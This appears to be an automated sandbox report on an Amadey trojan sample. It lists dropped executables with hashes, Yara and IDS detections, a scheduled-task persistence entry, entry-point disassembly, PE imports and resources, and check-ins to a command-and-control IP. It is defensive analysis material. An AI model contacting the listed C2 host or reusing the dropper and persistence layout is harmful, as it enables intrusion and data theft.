                          Classification:mal100.troj.spyw.evad.winEXE@38/14@0/1
                          EGA Information:
                          • Successful, ratio: 100%
                          HDC Information:
                          • Successful, ratio: 46.9% (good quality ratio 44.9%)
                          • Quality average: 84.9%
                          • Quality standard deviation: 24.2%
                          HCA Information:
                          • Successful, ratio: 100%
                          • Number of executed functions: 0
                          • Number of non-executed functions: 0
                          Cookbook Comments:
                          • Found application associated with file extension: .exe
                          • Override analysis time to 240s for rundll32
                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                          • HTTP Packets have been reduced
                          • TCP Packets have been reduced to 100
                          • Excluded domains from analysis (whitelisted): client.wns.windows.com, fs.microsoft.com
                          • Not all processes where analyzed, report is missing behavior information
                          • Report creation exceeded maximum time and may have missing disassembly code information.
                          • Report size exceeded maximum capacity and may have missing behavior information.
                          • Report size getting too big, too many NtDeviceIoControlFile calls found.
                          • Report size getting too big, too many NtOpenKeyEx calls found.
                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                          • Report size getting too big, too many NtQueryValueKey calls found.
                          TimeTypeDescription
                          20:00:47API Interceptor2477x Sleep call for process: mnolyk.exe modified
                          20:00:50Task SchedulerRun new task: mnolyk.exe path: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          No context
                          No context
                          No context
                          No context
                          No context
                          Process:C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exe
                          File Type:CSV text
                          Category:dropped
                          Size (bytes):226
                          Entropy (8bit):5.354940450065058
                          Encrypted:false
                          SSDEEP:6:Q3La/xw5DLIP12MUAvvR+uTL2wlAsDZiIv:Q3La/KDLI4MWuPTxAIv
                          MD5:B10E37251C5B495643F331DB2EEC3394
                          SHA1:25A5FFE4C2554C2B9A7C2794C9FE215998871193
                          SHA-256:8A6B926C70F8DCFD915D68F167A1243B9DF7B9F642304F570CE584832D12102D
                          SHA-512:296BC182515900934AA96E996FC48B565B7857801A07FEFA0D3D1E0C165981B266B084E344DB5B53041D1171F9C6708B4EE0D444906391C4FC073BCC23B92C37
                          Malicious:false
                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\10a17139182a9efd561f01fada9688a5\System.ni.dll",0..
                          Process:C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exe
                          File Type:ASCII text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):321
                          Entropy (8bit):5.355221377978991
                          Encrypted:false
                          SSDEEP:6:Q3La/xwchM3RJoDLIP12MUAvvR+uCqDLIP12MUAvvR+uTL2LDY3U21v:Q3La/hhkvoDLI4MWuCqDLI4MWuPk21v
                          MD5:03C5BA5FCE7124B503EA65EF522177C3
                          SHA1:F76B1F538D5EA66664355901E927B2F870ACCDD8
                          SHA-256:8128CE419BBE0419F1A0BDE97C3A14E3377C0184DC1D7AF61AA01AAB756B625B
                          SHA-512:151A974DDABA852144EC4BC18C548227A32E5261736F186A3920F2497434AEE9DBB0E0AB77E0E52A84A9FBC4529A158882B7549763400DDC2082D384B1135141
                          Malicious:false
                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..
                          Process:C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):91136
                          Entropy (8bit):6.3469756750979025
                          Encrypted:false
                          SSDEEP:1536:Fto4NPCKLbqoYkbpplW9YoUsxXzbcouNhj2ZszsWuKcdJU7dz5QIaB89p:roUCWbBNpplToUs1uNhj25LJUDaB89p
                          MD5:C79B74D8FEC5E7E2BA2F1789FD582A15
                          SHA1:78A1E5D99DBACCC5E07B125E1DFB280112CB3128
                          SHA-256:B5BD049D32F0FAEEA6CE65A0F0D326DE5BC4427A7C1AD24BFB0EA050C1DEC7D3
                          SHA-512:0DEBFC54904FD538CFB1FC648D18F90A991337200B3DECF74B28AC2F341843FB3BAB4F45BC92CFEC333B18DFFF9CC136854462E79054A39926A7BD8EE2E057BA
                          Malicious:true
                          Yara Hits:
                          • Rule: JoeSecurity_Amadey_3, Description: Yara detected Amadey\'s Clipper DLL, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OTUW0Q90\clip64[1].dll, Author: Joe Security
                          Antivirus:
                          • Antivirus: ReversingLabs, Detection: 81%
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........,Cy..Cy..Cy.....~Iy.....~.y.....~Qy.....~Ly.....~Ry.....~by.....~Fy..Cy...y.....~@y.....~By......By.....~By..RichCy..........PE..L....8.c...........!.................>....................................................@..........................J......<K..<...............................T... ?..p............................?..@...............,............................text...V........................... ..`.rdata...a.......b..................@..@.data...D....`.......D..............@....rsrc................P..............@..@.reloc..T............R..............@..B........................................................................................................................................................................................................................................................................................................
                          Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe
                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):241664
                          Entropy (8bit):6.368190069123744
                          Encrypted:false
                          SSDEEP:6144:YS/OgTLnk2FBtze+1T9uA/qruVyhVYjgVO:dO3v+uA+uVyhVvO
                          MD5:8BB923C4D81284DAEF7896E5682DF6C6
                          SHA1:67E34A96B77E44B666C5479F540995BDEACF5DE2
                          SHA-256:9B0410052289A8416A458401FBB9A74D6361F4769465431B209F32151D7C6F21
                          SHA-512:2DAED03277A343DB5FCB22E26BAEA5CDA41DE39DC825FE0AAD51F6EC181B8F38F09427F27FB58FFD179F37032600D107EF772CC6275F7D0D62899C6CD3F8AFF7
                          Malicious:true
                          Yara Hits:
                          • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe, Author: Joe Security
                          Antivirus:
                          • Antivirus: Joe Sandbox ML, Detection: 100%
                          • Antivirus: ReversingLabs, Detection: 81%
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......U.M...#...#...#.J. ...#.J.&..#.J.'...#..'...#.. ...#..&.:.#.J."...#..."..#.*...#.....#.!...#.Rich..#.........PE..L....8.c.............................y............@.......................................@.................................Hm..d................................(...?..p....................@......0@..@............................................text...}........................... ..`.rdata.............................@..@.data....D...........l..............@....rsrc...............................@..@.reloc...(.......*..................@..B................................................................................................................................................................................................................................................................................................................
                          Process:C:\Users\user\Desktop\file.exe
                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):346112
                          Entropy (8bit):7.640932751534781
                          Encrypted:false
                          SSDEEP:6144:K2y+bnr+Sp0yN90QEhNngiBIdDYf6EeYHPmSNjzAwtRS:KMriy90VRBIdhYzVtY
                          MD5:DAE3685D13248C42313D46F76E2EC968
                          SHA1:3547935A2D717DBFA69E9718F62A68ADDF58FFC8
                          SHA-256:13A8DA35A2F966FAC5A6A327FA92A963EA287878E63C5416BA4F49BF80EE4D8B
                          SHA-512:D77969AD3D60707C6870A0E14DC7DB9D7CB2624BBBC7448BF137E04B13232C28B1C796266CB8466D1F5C3FA720A006C884C13937E72C566A5074966E2AC0E566
                          Malicious:true
                          Antivirus:
                          • Antivirus: Joe Sandbox ML, Detection: 100%
                          • Antivirus: ReversingLabs, Detection: 54%
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........%...K..K..K...N..K...H..K...O..K...J..K..J...K...C..K.....K...I..K.Rich..K.........PE..L....`.b.................d..........`j............@.......................................@...... ......................................@...............................T...............................@............................................text....c.......d.................. ..`.data...H............h..............@....idata..R............j..............@..@.rsrc................|..............@..@.reloc...............>..............@..B........................................................................................................................................................................................................................................................................................................................................
                          Process:C:\Users\user\Desktop\file.exe
                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):241664
                          Entropy (8bit):6.368190069123744
                          Encrypted:false
                          SSDEEP:6144:YS/OgTLnk2FBtze+1T9uA/qruVyhVYjgVO:dO3v+uA+uVyhVvO
                          MD5:8BB923C4D81284DAEF7896E5682DF6C6
                          SHA1:67E34A96B77E44B666C5479F540995BDEACF5DE2
                          SHA-256:9B0410052289A8416A458401FBB9A74D6361F4769465431B209F32151D7C6F21
                          SHA-512:2DAED03277A343DB5FCB22E26BAEA5CDA41DE39DC825FE0AAD51F6EC181B8F38F09427F27FB58FFD179F37032600D107EF772CC6275F7D0D62899C6CD3F8AFF7
                          Malicious:true
                          Yara Hits:
                          • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe, Author: Joe Security
                          Antivirus:
                          • Antivirus: Joe Sandbox ML, Detection: 100%
                          • Antivirus: ReversingLabs, Detection: 81%
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......U.M...#...#...#.J. ...#.J.&..#.J.'...#..'...#.. ...#..&.:.#.J."...#..."..#.*...#.....#.!...#.Rich..#.........PE..L....8.c.............................y............@.......................................@.................................Hm..d................................(...?..p....................@......0@..@............................................text...}........................... ..`.rdata.............................@..@.data....D...........l..............@....rsrc...............................@..@.reloc...(.......*..................@..B................................................................................................................................................................................................................................................................................................................
                          Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\bfCg.exe
                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):251392
                          Entropy (8bit):7.321238876486759
                          Encrypted:false
                          SSDEEP:3072:SJsOlmNl8dK08LQXi3Wh59aFBIaYLDgoA702gTutxYfTPJgWoVbXTbw3Ga44:SJs/ud/8Lf3jBITDYMStefrJgr9b64
                          MD5:6E870598039CCE621C7BB265AC99BB3F
                          SHA1:708EACDFEC2DED675D36C1EB3EA628797A366E10
                          SHA-256:70C16C54B87BF8D2F57B36C26064E8E03D6F80CEB82254E556BE847A15CAEA95
                          SHA-512:6200818C2CA60B10F14DAD31A55D4A89F51E0682F7459764608FD96E57663247F0DAACF8C773501077AD47D5BADD12E6829E5CFD65593366011BD1B4326117A4
                          Malicious:true
                          Antivirus:
                          • Antivirus: Joe Sandbox ML, Detection: 100%
                          • Antivirus: ReversingLabs, Detection: 47%
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$....................B.s.....p.....f..............w...a.....q.....t....Rich...........PE..L....).a............................or............@.........................................................................l...P....p..............................@...............................p9..@............................................text............................... ..`.data...............................@....rsrc........p... ..................@..@.reloc...'.......(..................@..B................................................................................................................................................................................................................................................................................................................................................................................
                          Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\bfCg.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):11264
                          Entropy (8bit):4.97029807367379
                          Encrypted:false
                          SSDEEP:96:yA/vMth9sDLibql3A44P9QL4fwmPImg+A03PvXLOzk+gqWYV4J6oP/zNt:yw+wGWt94+iANiCkc4Jhp
                          MD5:7E93BACBBC33E6652E147E7FE07572A0
                          SHA1:421A7167DA01C8DA4DC4D5234CA3DD84E319E762
                          SHA-256:850CD190AAEEBCF1505674D97F51756F325E650320EAF76785D954223A9BEE38
                          SHA-512:250169D7B6FCEBFF400BE89EDAE8340F14130CED70C340BA9DA9F225F62B52B35F6645BFB510962EFB866F988688CB42392561D3E6B72194BC89D310EA43AA91
                          Malicious:true
                          Antivirus:
                          • Antivirus: Joe Sandbox ML, Detection: 100%
                          • Antivirus: ReversingLabs, Detection: 82%
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................"...0.."...........@... ...`....@.. ....................................@..................................@..O....`...............................@..8............................................ ............... ..H............text.... ... ...".................. ..`.rsrc........`.......$..............@..@.reloc...............*..............@..B.................@......H.......T$...............................................................0...........@s.....@...(....&*..0..K......... ?...(......~....(....,.*r...p.....(....%..(....& ....(....(....&.(....&*..0..e.......(....~........+G.....o....r#..p(....,-.o.... ......(....-.*.(....&(.....o....(....&..X....i2..(....&*....0..`.......(....~........+B.....o....r...p(....,(.o.... ......(....-.*.(....&.o....(....&..X....i2..(....&*.0..c......... ?...(......~....(....,.*....(............%...(...
                          Process:C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):91136
                          Entropy (8bit):6.3469756750979025
                          Encrypted:false
                          SSDEEP:1536:Fto4NPCKLbqoYkbpplW9YoUsxXzbcouNhj2ZszsWuKcdJU7dz5QIaB89p:roUCWbBNpplToUs1uNhj25LJUDaB89p
                          MD5:C79B74D8FEC5E7E2BA2F1789FD582A15
                          SHA1:78A1E5D99DBACCC5E07B125E1DFB280112CB3128
                          SHA-256:B5BD049D32F0FAEEA6CE65A0F0D326DE5BC4427A7C1AD24BFB0EA050C1DEC7D3
                          SHA-512:0DEBFC54904FD538CFB1FC648D18F90A991337200B3DECF74B28AC2F341843FB3BAB4F45BC92CFEC333B18DFFF9CC136854462E79054A39926A7BD8EE2E057BA
                          Malicious:true
                          Yara Hits:
                          • Rule: JoeSecurity_Amadey_3, Description: Yara detected Amadey\'s Clipper DLL, Source: C:\Users\user\AppData\Roaming\c1ec479e5342a2\clip64.dll, Author: Joe Security
                          Antivirus:
                          • Antivirus: ReversingLabs, Detection: 81%
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........,Cy..Cy..Cy.....~Iy.....~.y.....~Qy.....~Ly.....~Ry.....~by.....~Fy..Cy...y.....~@y.....~By......By.....~By..RichCy..........PE..L....8.c...........!.................>....................................................@..........................J......<K..<...............................T... ?..p............................?..@...............,............................text...V........................... ..`.rdata...a.......b..................@..@.data...D....`.......D..............@....rsrc................P..............@..@.reloc..T............R..............@..B........................................................................................................................................................................................................................................................................................................
                          Process:C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          File Type:HTML document, ASCII text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):162
                          Entropy (8bit):4.621829903792328
                          Encrypted:false
                          SSDEEP:3:qVoB3tURObOb0qHXboAcMBXqWrKb0GklIVLLPROZ/eIwcWWGu:q43tIkObRHXiMIWObtklI5LPROeIpfGu
                          MD5:1B7C22A214949975556626D7217E9A39
                          SHA1:D01C97E2944166ED23E47E4A62FF471AB8FA031F
                          SHA-256:340C8464C2007CE3F80682E15DFAFA4180B641D53C14201B929906B7B0284D87
                          SHA-512:BA64847CF1D4157D50ABE4F4A1E5C1996FE387C5808E2F758C7FB3213BFEFE1F3712D343F0C30A16819749840954654A70611D2250FD0F7B032429DB7AFD2CC5
                          Malicious:false
                          Preview:<html>..<head><title>404 Not Found</title></head>..<body>..<center><h1>404 Not Found</h1></center>..<hr><center>nginx/1.18.0 (Ubuntu)</center>..</body>..</html>..
                          Process:C:\Windows\SysWOW64\cacls.exe
                          File Type:ASCII text, with no line terminators
                          Category:dropped
                          Size (bytes):15
                          Entropy (8bit):3.240223928941852
                          Encrypted:false
                          SSDEEP:3:o3F:o1
                          MD5:509B054634B6DE74F111C3E646BC80FD
                          SHA1:99B4C0F39144A92FE42E22473A2A2552FB16BD13
                          SHA-256:07C7C151ADD6D955F3C876359C0E2A3A3FB0C519DD1E574413F0B68B345D8C36
                          SHA-512:A9C2D23947DBE09D5ECFBF6B3109F3CF8409E43176AE10C18083446EDE006E60E41C3EA2D2765036A967FC81B085D5F271686606AED4154AE45287D412CF6D40
                          Malicious:false
                          Preview:processed dir:
                          File type:PE32 executable (GUI) Intel 80386, for MS Windows
                          Entropy (8bit):7.8099344672941
                          TrID:
                          • Win32 Executable (generic) a (10002005/4) 99.96%
                          • Generic Win/DOS Executable (2004/3) 0.02%
                          • DOS Executable Generic (2002/1) 0.02%
                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                          File name:file.exe
                          File size:537088
                          MD5:16755b75334b8655bc2357553a9fdab4
                          SHA1:5705cf96e5337cd165fce107d5d11c020a69fe4f
                          SHA256:e2b454a6a774a94abfde2acec235fde33da717943ab9e2c5c51b8428df0f9253
                          SHA512:4dd98cecf0c988ca46aab7f9544ebc326653802e65014add232c7d926194eb07c7f7ace11e1ae85c36873845680df803cffb4878371e8ba185a44a81f588b348
                          SSDEEP:6144:Kky+bnr+Pp0yN90QEDJ1o6Su5TojNCee1utRhD8r8yDdTIfDYt6EeYwPmSNVzAwE:0MrPy9066SuO/pyhTIb7Y4VtukFu
                          TLSH:3DB40207D6EC8022D4F557B019F343C3063B7EA15B7893AB224D9C5A1D73AA4A6713BB
                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........%...K...K...K...N...K...H...K...O...K...J...K...J...K...C...K.......K...I...K.Rich..K.........PE..L....`.b.................d.
                          Icon Hash:f8e0e4e8ecccc870
                          Entrypoint:0x406a60
                          Entrypoint Section:.text
                          Digitally signed:false
                          Imagebase:0x400000
                          Subsystem:windows gui
                          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                          DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                          Time Stamp:0x628D60E2 [Tue May 24 22:49:06 2022 UTC]
                          TLS Callbacks:
                          CLR (.Net) Version:
                          OS Version Major:10
                          OS Version Minor:0
                          File Version Major:10
                          File Version Minor:0
                          Subsystem Version Major:10
                          Subsystem Version Minor:0
                          Import Hash:646167cce332c1c252cdcb1839e0cf48
                          Instruction
                          call 00007FEDA4ACE4A5h
                          jmp 00007FEDA4ACDDB5h
                          push 00000058h
                          push 004072B8h
                          call 00007FEDA4ACE547h
                          xor ebx, ebx
                          mov dword ptr [ebp-20h], ebx
                          lea eax, dword ptr [ebp-68h]
                          push eax
                          call dword ptr [0040A184h]
                          mov dword ptr [ebp-04h], ebx
                          mov eax, dword ptr fs:[00000018h]
                          mov esi, dword ptr [eax+04h]
                          mov edi, ebx
                          mov edx, 004088ACh
                          mov ecx, esi
                          xor eax, eax
                          lock cmpxchg dword ptr [edx], ecx
                          test eax, eax
                          je 00007FEDA4ACDDCAh
                          cmp eax, esi
                          jne 00007FEDA4ACDDB9h
                          xor esi, esi
                          inc esi
                          mov edi, esi
                          jmp 00007FEDA4ACDDC2h
                          push 000003E8h
                          call dword ptr [0040A188h]
                          jmp 00007FEDA4ACDD89h
                          xor esi, esi
                          inc esi
                          cmp dword ptr [004088B0h], esi
                          jne 00007FEDA4ACDDBCh
                          push 0000001Fh
                          call 00007FEDA4ACE2DBh
                          pop ecx
                          jmp 00007FEDA4ACDDECh
                          cmp dword ptr [004088B0h], ebx
                          jne 00007FEDA4ACDDDEh
                          mov dword ptr [004088B0h], esi
                          push 004010C4h
                          push 004010B8h
                          call 00007FEDA4ACDF06h
                          pop ecx
                          pop ecx
                          test eax, eax
                          je 00007FEDA4ACDDC9h
                          mov dword ptr [ebp-04h], FFFFFFFEh
                          mov eax, 000000FFh
                          jmp 00007FEDA4ACDEE9h
                          mov dword ptr [004081E4h], esi
                          cmp dword ptr [004088B0h], esi
                          jne 00007FEDA4ACDDCDh
                          push 004010B4h
                          push 004010ACh
                          call 00007FEDA4ACE495h
                          pop ecx
                          pop ecx
                          mov dword ptr [000088B0h], 00000000h
                          NameVirtual AddressVirtual Size Is in Section
                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                          IMAGE_DIRECTORY_ENTRY_IMPORT0xa28c0xb4.idata
                          IMAGE_DIRECTORY_ENTRY_RESOURCE0xc0000x7aae4.rsrc
                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x870000x888.reloc
                          IMAGE_DIRECTORY_ENTRY_DEBUG0x14100x54.text
                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x10080x40.text
                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                          IMAGE_DIRECTORY_ENTRY_IAT0xa0000x288.idata
                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                          NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                          .text0x10000x63140x6400False0.5744140625data6.314163792045976IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                          .data0x80000x1a480x200False0.609375data4.970639543960129IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                          .idata0xa0000x10520x1200False0.4140625data5.025949912909207IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                          .rsrc0xc0000x7b0000x7ac00False0.9243293342668024data7.854654116031079IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                          .reloc0x870000x8880xa00False0.746484375data6.222637930812128IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                          NameRVASizeTypeLanguageCountry
                          AVI0xcb300x2e1aRIFF (little-endian) data, AVI, 272 x 60, 10.00 fps, video: RLE 8bppEnglishUnited States
                          RT_ICON0xf94c0x668Device independent bitmap graphic, 48 x 96 x 4, image size 1152EnglishUnited States
                          RT_ICON0xffb40x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 512EnglishUnited States
                          RT_ICON0x1029c0x1e8Device independent bitmap graphic, 24 x 48 x 4, image size 288EnglishUnited States
                          RT_ICON0x104840x128Device independent bitmap graphic, 16 x 32 x 4, image size 128EnglishUnited States
                          RT_ICON0x105ac0xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsEnglishUnited States
                          RT_ICON0x114540x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsEnglishUnited States
                          RT_ICON0x11cfc0x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colorsEnglishUnited States
                          RT_ICON0x123c40x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsEnglishUnited States
                          RT_ICON0x1292c0xd9d2PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States
                          RT_ICON0x203000x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States
                          RT_ICON0x228a80x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States
                          RT_ICON0x239500x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400EnglishUnited States
                          RT_ICON0x242d80x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States
                          RT_DIALOG0x247400x2f2dataEnglishUnited States
                          RT_DIALOG0x24a340x35cdataRussianRussia
                          RT_DIALOG0x24d900x1b0dataEnglishUnited States
                          RT_DIALOG0x24f400x1b4dataRussianRussia
                          RT_DIALOG0x250f40x166dataEnglishUnited States
                          RT_DIALOG0x2525c0x168dataRussianRussia
                          RT_DIALOG0x253c40x1c0dataEnglishUnited States
                          RT_DIALOG0x255840x1e0dataRussianRussia
                          RT_DIALOG0x257640x130dataEnglishUnited States
                          RT_DIALOG0x258940x150dataRussianRussia
                          RT_DIALOG0x259e40x120dataEnglishUnited States
                          RT_DIALOG0x25b040x122dataRussianRussia
                          RT_STRING0x25c280x8cMatlab v4 mat-file (little endian) l, numeric, rows 0, columns 0EnglishUnited States
                          RT_STRING0x25cb40x86Matlab v4 mat-file (little endian) K\0041\0045\004@\0048\004B\0045\004 , numeric, rows 0, columns 0RussianRussia
                          RT_STRING0x25d3c0x520dataEnglishUnited States
                          RT_STRING0x2625c0x52edataRussianRussia
                          RT_STRING0x2678c0x5ccdataEnglishUnited States
                          RT_STRING0x26d580x592dataRussianRussia
                          RT_STRING0x272ec0x4b0dataEnglishUnited States
                          RT_STRING0x2779c0x4b2dataRussianRussia
                          RT_STRING0x27c500x44adataEnglishUnited States
                          RT_STRING0x2809c0x43edataRussianRussia
                          RT_STRING0x284dc0x3cedataEnglishUnited States
                          RT_STRING0x288ac0x2fcdataRussianRussia
                          RT_RCDATA0x28ba80x7ASCII text, with no line terminatorsEnglishUnited States
                          RT_RCDATA0x28bb00x5ce06Microsoft Cabinet archive data, many, 380422 bytes, 2 files, at 0x2c +A "bfCg.exe" +A "xriv.exe", ID 1563, number 1, 18 datablocks, 0x1503 compressionEnglishUnited States
                          RT_RCDATA0x859b80x4dataEnglishUnited States
                          RT_RCDATA0x859bc0x24dataEnglishUnited States
                          RT_RCDATA0x859e00x7ASCII text, with no line terminatorsEnglishUnited States
                          RT_RCDATA0x859e80x7ASCII text, with no line terminatorsEnglishUnited States
                          RT_RCDATA0x859f00x4dataEnglishUnited States
                          RT_RCDATA0x859f40x9ASCII text, with no line terminatorsEnglishUnited States
                          RT_RCDATA0x85a000x4dataEnglishUnited States
                          RT_RCDATA0x85a040x9ASCII text, with no line terminatorsEnglishUnited States
                          RT_RCDATA0x85a100x4dataEnglishUnited States
                          RT_RCDATA0x85a140x6dataEnglishUnited States
                          RT_RCDATA0x85a1c0x7ASCII text, with no line terminatorsEnglishUnited States
                          RT_RCDATA0x85a240x7ASCII text, with no line terminatorsEnglishUnited States
                          RT_GROUP_ICON0x85a2c0xbcdataEnglishUnited States
                          RT_VERSION0x85ae80x408dataEnglishUnited States
                          RT_VERSION0x85ef00x410dataRussianRussia
                          RT_MANIFEST0x863000x7e2XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States
                          DLLImport
                          ADVAPI32.dllGetTokenInformation, RegDeleteValueA, RegOpenKeyExA, RegQueryInfoKeyA, FreeSid, OpenProcessToken, RegSetValueExA, RegCreateKeyExA, LookupPrivilegeValueA, AllocateAndInitializeSid, RegQueryValueExA, EqualSid, RegCloseKey, AdjustTokenPrivileges
                          KERNEL32.dll_lopen, _llseek, CompareStringA, GetLastError, GetFileAttributesA, GetSystemDirectoryA, LoadLibraryA, DeleteFileA, GlobalAlloc, GlobalFree, CloseHandle, WritePrivateProfileStringA, IsDBCSLeadByte, GetWindowsDirectoryA, SetFileAttributesA, GetProcAddress, GlobalLock, LocalFree, RemoveDirectoryA, FreeLibrary, _lclose, CreateDirectoryA, GetPrivateProfileIntA, GetPrivateProfileStringA, GlobalUnlock, ReadFile, SizeofResource, WriteFile, GetDriveTypeA, lstrcmpA, SetFileTime, SetFilePointer, FindResourceA, CreateMutexA, GetVolumeInformationA, ExpandEnvironmentStringsA, GetCurrentDirectoryA, FreeResource, GetVersion, SetCurrentDirectoryA, GetTempPathA, LocalFileTimeToFileTime, CreateFileA, SetEvent, TerminateThread, GetVersionExA, LockResource, GetSystemInfo, CreateThread, ResetEvent, LoadResource, ExitProcess, GetModuleHandleW, CreateProcessA, FormatMessageA, GetTempFileNameA, DosDateTimeToFileTime, CreateEventA, GetExitCodeProcess, FindNextFileA, LocalAlloc, GetShortPathNameA, MulDiv, GetDiskFreeSpaceA, EnumResourceLanguagesA, GetTickCount, GetSystemTimeAsFileTime, GetCurrentThreadId, GetCurrentProcessId, QueryPerformanceCounter, TerminateProcess, SetUnhandledExceptionFilter, UnhandledExceptionFilter, GetStartupInfoW, Sleep, FindClose, GetCurrentProcess, FindFirstFileA, WaitForSingleObject, GetModuleFileNameA, LoadLibraryExA
                          GDI32.dllGetDeviceCaps
                          USER32.dllSetWindowLongA, GetDlgItemTextA, DialogBoxIndirectParamA, ShowWindow, MsgWaitForMultipleObjects, SetWindowPos, GetDC, GetWindowRect, DispatchMessageA, GetDesktopWindow, CharUpperA, SetDlgItemTextA, ExitWindowsEx, MessageBeep, EndDialog, CharPrevA, LoadStringA, CharNextA, EnableWindow, ReleaseDC, SetForegroundWindow, PeekMessageA, GetDlgItem, SendMessageA, SendDlgItemMessageA, MessageBoxA, SetWindowTextA, GetWindowLongA, CallWindowProcA, GetSystemMetrics
                          msvcrt.dll_controlfp, ?terminate@@YAXXZ, _acmdln, _initterm, __setusermatherr, _except_handler4_common, memcpy, _ismbblead, __p__fmode, _cexit, _exit, exit, __set_app_type, __getmainargs, _amsg_exit, __p__commode, _XcptFilter, memcpy_s, _vsnprintf, memset
                          COMCTL32.dll
                          Cabinet.dll
                          VERSION.dllGetFileVersionInfoA, VerQueryValueA, GetFileVersionInfoSizeA
                          Language of compilation systemCountry where language is spokenMap
                          EnglishUnited States
                          RussianRussia
                          TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                          192.168.2.662.204.41.449858802027700 02/07/23-20:01:29.126524TCP2027700ET TROJAN Amadey CnC Check-In4985880192.168.2.662.204.41.4
                          192.168.2.662.204.41.450186802027700 02/07/23-20:03:04.107236TCP2027700ET TROJAN Amadey CnC Check-In5018680192.168.2.662.204.41.4
